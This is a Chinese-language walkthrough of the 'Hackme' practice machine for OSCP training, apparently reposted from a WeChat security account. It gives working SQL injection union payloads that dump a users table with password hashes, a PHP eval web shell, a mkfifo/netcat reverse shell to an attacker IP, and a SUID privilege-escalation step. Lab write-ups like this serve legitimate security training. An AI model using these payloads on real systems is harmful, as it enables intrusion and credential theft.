~ 十年树人,百年树木 ~
主机发现和80探测
端口扫描
目录扫描,访问这个图片看看
没东西了,就登录试试万能密码
注册一个用户去
登录后,那个重置密码的url没有用了,旁边那个链接就是退出登录
直接进入的时候是没有任何结果的,要先点一下search按钮
搜索关键字,oscp
能直接查出结果了,存在sql注入漏洞,需要注意的是万能密码地方的空格(qwq前面的空格很重要)
oscp' or 1=1 -- qwq
判断列数
oscp' or 1=1 order by 3 -- qwq
联合查询
oscp' union select 1,2,3 -- qwq
当前数据库
oscp' union select database(),2,3 -- qwq
# webapphacking
暴数据库
oscp' union select group_concat(schema_name),2,3 from information_schema.schemata -- qwq
# information_schema,mysql,performance_schema,sys,webapphacking
暴当前数据库的表
oscp' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database() -- qwq
# books,users
users表的列(字段)
oscp' union select group_concat(column_name),2,3 from information_schema.columns where table_schema=database() and table_name="users" -- qwq
# id,user,pasword,name,address
暴表数据
oscp' union select group_concat(user,'-',pasword),2,3 from users -- qwq
# user1-5d41402abc4b2a76b9719d911017c592 hello
# user2-6269c4f71a55b24bad0f0267d9be5508 commando
# user3-0f359740bd1cda994f8b55330c86d845 p@ssw0rd
# test-05a671c66aefea124cc08b76ea6d30bb testtest
# superadmin-2386acb2cf356944177746fc92523983 Uncrackable
# test1-05a671c66aefea124cc08b76ea6d30bb testtest
# 下面两个是新加的
# xiaoyu-348f10f863b27ec106195c96e23dcd91 xiaoyu
# admin-e10adc3949ba59abbe56e057f20f883e 123456
有了密码,ssh试试全都失败
登录账号 superadmin 有一个文件上传
上传一个一句话木马shell.php
<?php @eval($_POST['cmd']);?>
蚂蚁连接
这里的nc没有-e参数,所以用如下命令进行反弹 shell(测试了很多都不行,包括bash)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.111.128 6666 >/tmp/f
反弹成功
创建交互式终端
python3 -c 'import pty; pty.spawn("/bin/bash");'
系统信息收集
切换到home文件夹下面,意外发现一个suid文件
执行文件,即可提权成功
往期推荐
【oscp】Blender软件的信息泄露---VulnOSv2
【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!
原文始发于微信公众号(泷羽Sec-Norsea):【oscp】Hackme
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论